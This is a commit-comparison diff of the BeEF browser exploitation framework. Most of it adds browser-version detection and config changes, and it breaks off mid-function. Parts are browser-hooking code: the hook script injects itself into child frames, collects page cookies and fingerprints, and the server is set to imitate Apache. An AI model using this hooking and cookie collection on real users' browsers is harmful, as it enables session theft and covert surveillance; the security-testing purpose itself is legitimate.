Compare commits
102 Commits
beef-0.4.4
...
beef-0.4.4
| Author | SHA1 | Date | |
|---|---|---|---|
|
8cf17b01a5 | ||
|
|
164ff5bea6 | ||
|
6c6a33db50 | ||
|
e95c74b5e1 | ||
|
0dd499c71a | ||
|
|
dab58f0e61 | ||
|
|
2e68470d23 | ||
|
|
473f349394 | ||
|
|
dbebf12d27 | ||
|
|
96f763b7e0 | ||
|
d40486c391 | ||
|
|
d43f443555 | ||
|
|
2b473bfda9 | ||
|
|
a2b627c8ae | ||
|
|
dbabb379fb | ||
|
|
5252bea54a | ||
|
|
7fdfcc3ef0 | ||
|
|
3c5b68e112 | ||
|
|
9e17958268 | ||
|
f2efa533c8 | ||
|
|
9636cb0972 | ||
|
|
1dc59f7b01 | ||
|
|
ff620d42f4 | ||
|
|
61e6337046 | ||
|
|
639d0611a6 | ||
|
|
ab7a62e8a4 | ||
|
|
71f04d82f5 | ||
|
|
704b979054 | ||
|
|
7aaafc79aa | ||
|
|
f90ad4a261 | ||
|
|
0dfab0e348 | ||
|
|
018a849e14 | ||
|
|
717f63ff0c | ||
|
|
9bac6b4fc1 | ||
|
|
2dae1d4c07 | ||
|
|
7de48ceafb | ||
|
|
8ecdceb928 | ||
|
498372aef3 | ||
|
|
55d8506960 | ||
|
|
8d60c10298 | ||
|
|
94d15cd386 | ||
|
|
5bbf26abac | ||
|
|
5b90c351da | ||
|
|
b501fe7c1a | ||
|
|
b28e631500 | ||
|
|
5722cb2bc1 | ||
|
|
0479744dfc | ||
|
|
3dbfdbac7e | ||
|
|
d3262d9451 | ||
|
|
906ca6ccce | ||
|
ea560c3464 | ||
|
b79402ce5f | ||
|
|
1699d52475 | ||
|
|
c5d5b99472 | ||
|
|
9915547b19 | ||
|
|
ef2eac26eb | ||
|
|
09be2db069 | ||
|
|
6da4e2c39c | ||
|
|
15c7e64e93 | ||
|
|
91e2b36ce4 | ||
|
|
b82696ead2 | ||
|
|
7233957664 | ||
|
|
88678f986c | ||
|
|
719bb4a20b | ||
|
|
4ea18852f6 | ||
|
c16479a14e | ||
|
|
59951959f1 | ||
|
|
da763df110 | ||
|
|
4980ca02a6 | ||
|
|
6e0f7a266e | ||
|
|
e3cb7f7a2d | ||
|
|
6e9db43463 | ||
|
|
a172362452 | ||
|
|
55b0bee9ca | ||
|
|
950c3d37a7 | ||
|
|
1721d3c263 | ||
|
|
5585879cca | ||
|
|
d855100ac9 | ||
|
|
fad33dfea7 | ||
|
|
b4732a9438 | ||
|
|
73e291832e | ||
|
|
85b204f52b | ||
|
|
78410e28eb | ||
|
|
222cff3f1d | ||
|
|
2ef1b5bab8 | ||
|
|
af67c6a8d9 | ||
|
|
79572a61f0 | ||
|
|
2fcdf1038d | ||
|
cca21f1003 | ||
|
|
07fe3a9c0e | ||
|
|
69fd3e600c | ||
|
|
ae98842ad4 | ||
|
|
159ecb5ade | ||
|
cf4ab9533e | ||
|
|
9a23ed758e | ||
|
|
389f27360d | ||
|
|
e8eda3ef99 | ||
|
af8018500b | ||
|
|
22cd68101d | ||
|
|
760e7a456e | ||
|
66d0e3535b | ||
|
|
e79372f8ac |
7
Gemfile
7
Gemfile
@@ -9,13 +9,12 @@
|
||||
# Gems only required on Windows, or with specific Windows issues
|
||||
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
|
||||
gem "win32console"
|
||||
gem "eventmachine", "1.0.0.beta.4.1"
|
||||
else
|
||||
gem "eventmachine", "0.12.10"
|
||||
end
|
||||
|
||||
gem "eventmachine", "1.0.3"
|
||||
gem "thin"
|
||||
gem "sinatra", "1.3.2"
|
||||
gem "sinatra", "1.4.2"
|
||||
gem "rack", "1.5.2"
|
||||
gem "em-websocket", "~> 0.3.6"
|
||||
gem "jsmin", "~> 1.0.1"
|
||||
gem "ansi"
|
||||
|
||||
6
Rakefile
6
Rakefile
@@ -76,10 +76,10 @@ end
|
||||
@beef_process_id = nil;
|
||||
|
||||
task :beef_start => 'beef' do
|
||||
printf "Starting BeEF (wait 10 seconds)..."
|
||||
printf "Starting BeEF (wait a few seconds)..."
|
||||
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
|
||||
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
|
||||
delays.each do |i| # delay for 10 seconds
|
||||
delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
|
||||
delays.each do |i| # delay for a few seconds
|
||||
printf '.'
|
||||
sleep (i)
|
||||
end
|
||||
|
||||
2
VERSION
2
VERSION
@@ -4,4 +4,4 @@
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
|
||||
0.4.4.3-alpha
|
||||
0.4.4.6-alpha
|
||||
|
||||
1
beef
1
beef
@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
|
||||
DataMapper.setup(:default,
|
||||
:adapter => config.get("beef.database.driver"),
|
||||
:host => config.get("beef.database.db_host"),
|
||||
:port => config.get("beef.database.db_port"),
|
||||
:username => config.get("beef.database.db_user"),
|
||||
:password => config.get("beef.database.db_passwd"),
|
||||
:database => config.get("beef.database.db_name"),
|
||||
|
||||
21
config.yaml
21
config.yaml
@@ -6,7 +6,7 @@
|
||||
# BeEF Configuration file
|
||||
|
||||
beef:
|
||||
version: '0.4.4.3-alpha'
|
||||
version: '0.4.4.6-alpha'
|
||||
debug: false
|
||||
|
||||
restrictions:
|
||||
@@ -27,12 +27,20 @@ beef:
|
||||
# if running behind a nat set the public ip address here
|
||||
#public: ""
|
||||
#public_port: "" # port setting is experimental
|
||||
dns: "localhost"
|
||||
# DNS
|
||||
dns_host: "localhost"
|
||||
dns_port: 53
|
||||
panel_path: "/ui/panel"
|
||||
hook_file: "/hook.js"
|
||||
hook_session_name: "BEEFHOOK"
|
||||
session_cookie_name: "BEEFSESSION"
|
||||
|
||||
# Allow one or multiple domains to access the RESTful API using CORS
|
||||
# For multiple domains use: "http://browserhacker.com, http://domain2.com"
|
||||
restful_api:
|
||||
allow_cors: false
|
||||
cors_allowed_domains: "http://browserhacker.com"
|
||||
|
||||
# Prefer WebSockets over XHR-polling when possible.
|
||||
websocket:
|
||||
enable: false
|
||||
@@ -43,14 +51,14 @@ beef:
|
||||
|
||||
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
|
||||
web_server_imitation:
|
||||
enable: false
|
||||
enable: true
|
||||
type: "apache" #supported: apache, iis
|
||||
|
||||
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
|
||||
https:
|
||||
enable: false
|
||||
# In production environments, be sure to use a valid certificate signed for the value
|
||||
# used in beef.http.dns (the domain name of the server where you run BeEF)
|
||||
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
|
||||
key: "beef_key.pem"
|
||||
cert: "beef_cert.pem"
|
||||
|
||||
@@ -72,6 +80,7 @@ beef:
|
||||
|
||||
# db connection information is only used for mysql/postgres
|
||||
db_host: "localhost"
|
||||
db_port: 5432
|
||||
db_name: "beef"
|
||||
db_user: "beef"
|
||||
db_passwd: "beef123"
|
||||
@@ -91,6 +100,10 @@ beef:
|
||||
|
||||
crypto_default_value_length: 80
|
||||
|
||||
# Enable client-side debugging
|
||||
client:
|
||||
debug: false
|
||||
|
||||
# You may override default extension configuration parameters here
|
||||
extension:
|
||||
requester:
|
||||
|
||||
@@ -22,7 +22,7 @@ module Filters
|
||||
def self.is_valid_browsertype?(str)
|
||||
return false if not is_non_empty_string?(str)
|
||||
return false if str.length < 10
|
||||
return false if str.length > 50
|
||||
return false if str.length > 250
|
||||
return false if has_non_printable_char?(str)
|
||||
true
|
||||
end
|
||||
@@ -123,9 +123,9 @@ module Filters
|
||||
return true if not is_non_empty_string?(str)
|
||||
return false if str.length > 1000
|
||||
if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
|
||||
return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
|
||||
return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
|
||||
else
|
||||
return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
|
||||
return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
|
||||
|
||||
// An array containing all the BeEF JS components.
|
||||
components: new Array(),
|
||||
|
||||
|
||||
/**
|
||||
* Adds a function to display debug messages (wraps console.log())
|
||||
* @param: {string} the debug string to return
|
||||
*/
|
||||
debug: function(msg) {
|
||||
if (!<%= @client_debug %>) return;
|
||||
if (typeof console == "object" && typeof console.log == "function") {
|
||||
console.log(msg);
|
||||
} else {
|
||||
// TODO: maybe add a callback to BeEF server for debugging purposes
|
||||
//window.alert(msg);
|
||||
}
|
||||
},
|
||||
|
||||
/**
|
||||
* Adds a function to execute.
|
||||
* @param: {Function} the function to execute.
|
||||
|
||||
@@ -19,6 +19,22 @@ beef.browser = {
|
||||
return navigator.userAgent;
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Avant Browser.
|
||||
* @example: beef.browser.isA()
|
||||
*/
|
||||
isA:function () {
|
||||
return window.navigator.userAgent.match(/Avant TriCore/) != null;
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Iceweasel.
|
||||
* @example: beef.browser.isI()
|
||||
*/
|
||||
isI:function () {
|
||||
return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if IE6.
|
||||
* @example: beef.browser.isIE6()
|
||||
@@ -236,12 +252,20 @@ beef.browser = {
|
||||
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if FF21
|
||||
* @example: beef.browser.isFF21()
|
||||
*/
|
||||
isFF21:function () {
|
||||
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if FF.
|
||||
* @example: beef.browser.isFF()
|
||||
*/
|
||||
isFF:function () {
|
||||
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
|
||||
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
|
||||
},
|
||||
|
||||
/**
|
||||
@@ -396,6 +420,14 @@ beef.browser = {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 19.
|
||||
* @example: beef.browser.isC19iOS()
|
||||
*/
|
||||
isC19iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 20.
|
||||
* @example: beef.browser.isC20()
|
||||
@@ -404,6 +436,14 @@ beef.browser = {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 20.
|
||||
* @example: beef.browser.isC20iOS()
|
||||
*/
|
||||
isC20iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 21.
|
||||
* @example: beef.browser.isC21()
|
||||
@@ -412,6 +452,14 @@ beef.browser = {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 21.
|
||||
* @example: beef.browser.isC21iOS()
|
||||
*/
|
||||
isC21iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 22.
|
||||
* @example: beef.browser.isC22()
|
||||
@@ -420,6 +468,14 @@ beef.browser = {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 22.
|
||||
* @example: beef.browser.isC22iOS()
|
||||
*/
|
||||
isC22iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 23.
|
||||
* @example: beef.browser.isC23()
|
||||
@@ -428,6 +484,14 @@ beef.browser = {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 23.
|
||||
* @example: beef.browser.isC23iOS()
|
||||
*/
|
||||
isC23iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 24.
|
||||
* @example: beef.browser.isC24()
|
||||
@@ -436,6 +500,14 @@ beef.browser = {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 24.
|
||||
* @example: beef.browser.isC24iOS()
|
||||
*/
|
||||
isC24iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 25.
|
||||
* @example: beef.browser.isC25()
|
||||
@@ -444,12 +516,68 @@ beef.browser = {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 25.
|
||||
* @example: beef.browser.isC25iOS()
|
||||
*/
|
||||
isC25iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 26.
|
||||
* @example: beef.browser.isC26()
|
||||
*/
|
||||
isC26:function () {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 26.
|
||||
* @example: beef.browser.isC26iOS()
|
||||
*/
|
||||
isC26iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 27.
|
||||
* @example: beef.browser.isC27()
|
||||
*/
|
||||
isC27:function () {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 27.
|
||||
* @example: beef.browser.isC27iOS()
|
||||
*/
|
||||
isC27iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome 28.
|
||||
* @example: beef.browser.isC28()
|
||||
*/
|
||||
isC28:function () {
|
||||
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome for iOS 28.
|
||||
* @example: beef.browser.isC28iOS()
|
||||
*/
|
||||
isC28iOS:function () {
|
||||
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns true if Chrome.
|
||||
* @example: beef.browser.isC()
|
||||
*/
|
||||
isC:function () {
|
||||
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25();
|
||||
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
|
||||
},
|
||||
|
||||
/**
|
||||
@@ -524,12 +652,25 @@ beef.browser = {
|
||||
C17:this.isC17(), // Chrome 17
|
||||
C18:this.isC18(), // Chrome 18
|
||||
C19:this.isC19(), // Chrome 19
|
||||
C19iOS:this.isC19iOS(), // Chrome 19 on iOS
|
||||
C20:this.isC20(), // Chrome 20
|
||||
C20iOS:this.isC20iOS(), // Chrome 20 on iOS
|
||||
C21:this.isC21(), // Chrome 21
|
||||
C21iOS:this.isC21iOS(), // Chrome 21 on iOS
|
||||
C22:this.isC22(), // Chrome 22
|
||||
C22iOS:this.isC22iOS(), // Chrome 22 on iOS
|
||||
C23:this.isC23(), // Chrome 23
|
||||
C23iOS:this.isC23iOS(), // Chrome 23 on iOS
|
||||
C24:this.isC24(), // Chrome 24
|
||||
C24iOS:this.isC24iOS(), // Chrome 24 on iOS
|
||||
C25:this.isC25(), // Chrome 25
|
||||
C25iOS:this.isC25iOS(), // Chrome 25 on iOS
|
||||
C26:this.isC26(), // Chrome 26
|
||||
C26iOS:this.isC26iOS(), // Chrome 26 on iOS
|
||||
C27:this.isC27(), // Chrome 27
|
||||
C27iOS:this.isC27iOS(), // Chrome 27 on iOS
|
||||
C28:this.isC28(), // Chrome 28
|
||||
C28iOS:this.isC28iOS(), // Chrome 28 on iOS
|
||||
C:this.isC(), // Chrome any version
|
||||
|
||||
FF2:this.isFF2(), // Firefox 2
|
||||
@@ -552,7 +693,8 @@ beef.browser = {
|
||||
FF17:this.isFF17(), // Firefox 17
|
||||
FF18:this.isFF18(), // Firefox 18
|
||||
FF19:this.isFF19(), // Firefox 19
|
||||
FF20:this.isFF20(), // Firefox 20
|
||||
FF20:this.isFF20(), // Firefox 20
|
||||
FF21:this.isFF21(), // Firefox 21
|
||||
FF:this.isFF(), // Firefox any version
|
||||
|
||||
IE6:this.isIE6(), // Internet Explorer 6
|
||||
@@ -644,30 +786,82 @@ beef.browser = {
|
||||
return '19'
|
||||
}
|
||||
; // Chrome 19
|
||||
if (this.isC19iOS()) {
|
||||
return '19'
|
||||
}
|
||||
; // Chrome 19 for iOS
|
||||
if (this.isC20()) {
|
||||
return '20'
|
||||
}
|
||||
; // Chrome 20
|
||||
if (this.isC20iOS()) {
|
||||
return '20'
|
||||
}
|
||||
; // Chrome 20 for iOS
|
||||
if (this.isC21()) {
|
||||
return '21'
|
||||
}
|
||||
; // Chrome 21
|
||||
if (this.isC21iOS()) {
|
||||
return '21'
|
||||
}
|
||||
; // Chrome 21 for iOS
|
||||
if (this.isC22()) {
|
||||
return '22'
|
||||
}
|
||||
; // Chrome 22
|
||||
if (this.isC22iOS()) {
|
||||
return '22'
|
||||
}
|
||||
; // Chrome 22 for iOS
|
||||
if (this.isC23()) {
|
||||
return '23'
|
||||
}
|
||||
; // Chrome 23
|
||||
if (this.isC23iOS()) {
|
||||
return '23'
|
||||
}
|
||||
; // Chrome 23 for iOS
|
||||
if (this.isC24()) {
|
||||
return '24'
|
||||
}
|
||||
; // Chrome 24
|
||||
if (this.isC24iOS()) {
|
||||
return '24'
|
||||
}
|
||||
; // Chrome 24 for iOS
|
||||
if (this.isC25()) {
|
||||
return '25'
|
||||
}
|
||||
;
|
||||
; // Chrome 25
|
||||
if (this.isC25iOS()) {
|
||||
return '25'
|
||||
}
|
||||
; // Chrome 25 for iOS
|
||||
if (this.isC26()) {
|
||||
return '26'
|
||||
}
|
||||
; // Chrome 26
|
||||
if (this.isC26iOS()) {
|
||||
return '26'
|
||||
}
|
||||
; // Chrome 26 for iOS
|
||||
if (this.isC27()) {
|
||||
return '27'
|
||||
}
|
||||
; // Chrome 27
|
||||
if (this.isC27iOS()) {
|
||||
return '27'
|
||||
}
|
||||
; // Chrome 27 for iOS
|
||||
if (this.isC28()) {
|
||||
return '28'
|
||||
}
|
||||
; // Chrome 28
|
||||
if (this.isC28iOS()) {
|
||||
return '28'
|
||||
}
|
||||
; // Chrome 28 for iOS
|
||||
if (this.isFF2()) {
|
||||
return '2'
|
||||
}
|
||||
@@ -748,10 +942,14 @@ beef.browser = {
|
||||
return '19'
|
||||
}
|
||||
; // Firefox 19
|
||||
if (this.isFF20()) {
|
||||
return '20'
|
||||
}
|
||||
; // Firefox 20
|
||||
if (this.isFF20()) {
|
||||
return '20'
|
||||
}
|
||||
; // Firefox 20
|
||||
if (this.isFF21()) {
|
||||
return '21'
|
||||
}
|
||||
; // Firefox 21
|
||||
|
||||
if (this.isIE6()) {
|
||||
return '6'
|
||||
@@ -858,10 +1056,10 @@ beef.browser = {
|
||||
try {
|
||||
// append hook script
|
||||
self.frames[i].document.body.appendChild(script);
|
||||
//console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
|
||||
beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
|
||||
} catch (e) {
|
||||
// warn on cross-domain
|
||||
//console.log("Hooking frame failed");
|
||||
beef.debug("Hooking frame failed");
|
||||
}
|
||||
}
|
||||
},
|
||||
@@ -1069,8 +1267,9 @@ beef.browser = {
|
||||
*/
|
||||
hasPhonegap:function () {
|
||||
var result = false;
|
||||
|
||||
try {
|
||||
if (!!device.phonegap) result = true; else result = false;
|
||||
if (!!device.phonegap || !!device.cordova) result = true; else result = false;
|
||||
}
|
||||
catch (e) {
|
||||
result = false;
|
||||
@@ -1436,63 +1635,64 @@ beef.browser = {
|
||||
getDetails:function () {
|
||||
var details = new Array();
|
||||
|
||||
var browser_name = beef.browser.getBrowserName();
|
||||
var browser_version = beef.browser.getBrowserVersion();
|
||||
var browser_name = beef.browser.getBrowserName();
|
||||
var browser_version = beef.browser.getBrowserVersion();
|
||||
var browser_reported_name = beef.browser.getBrowserReportedName();
|
||||
var page_title = (document.title) ? document.title : "Unknown";
|
||||
var page_uri = document.location.href;
|
||||
var page_referrer = (document.referrer) ? document.referrer : "Unknown";
|
||||
var hostname = document.location.hostname;
|
||||
var hostport = (document.location.port) ? document.location.port : "80";
|
||||
var browser_plugins = beef.browser.getPlugins();
|
||||
var date_stamp = new Date().toString();
|
||||
var os_name = beef.os.getName();
|
||||
var hw_name = beef.hardware.getName();
|
||||
var cpu_type = beef.hardware.cpuType();
|
||||
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
|
||||
var page_title = (document.title) ? document.title : "Unknown";
|
||||
var page_uri = (document.location.href) ? document.location.href : "Unknown";
|
||||
var page_referrer = (document.referrer) ? document.referrer : "Unknown";
|
||||
var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
|
||||
var hostport = (document.location.port) ? document.location.port : "80";
|
||||
var browser_plugins = beef.browser.getPlugins();
|
||||
var date_stamp = new Date().toString();
|
||||
var os_name = beef.os.getName();
|
||||
var hw_name = beef.hardware.getName();
|
||||
var cpu_type = beef.hardware.cpuType();
|
||||
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
|
||||
var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
|
||||
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
|
||||
if (value == true) return value; else if (typeof value == 'object') return value; else return;
|
||||
});
|
||||
var screen_size = beef.browser.getScreenSize();
|
||||
var window_size = beef.browser.getWindowSize();
|
||||
var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
|
||||
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
|
||||
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
|
||||
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
|
||||
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
|
||||
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
|
||||
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
|
||||
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
|
||||
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
|
||||
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
|
||||
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
|
||||
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
|
||||
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
|
||||
var screen_size = beef.browser.getScreenSize();
|
||||
var window_size = beef.browser.getWindowSize();
|
||||
var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
|
||||
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
|
||||
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
|
||||
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
|
||||
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
|
||||
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
|
||||
var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
|
||||
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
|
||||
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
|
||||
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
|
||||
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
|
||||
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
|
||||
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
|
||||
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
|
||||
try{
|
||||
var cookies = document.cookie;
|
||||
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
|
||||
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
|
||||
if (cookies) details["Cookies"] = cookies;
|
||||
if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
|
||||
if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
|
||||
if (cookies) details['Cookies'] = cookies;
|
||||
if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
|
||||
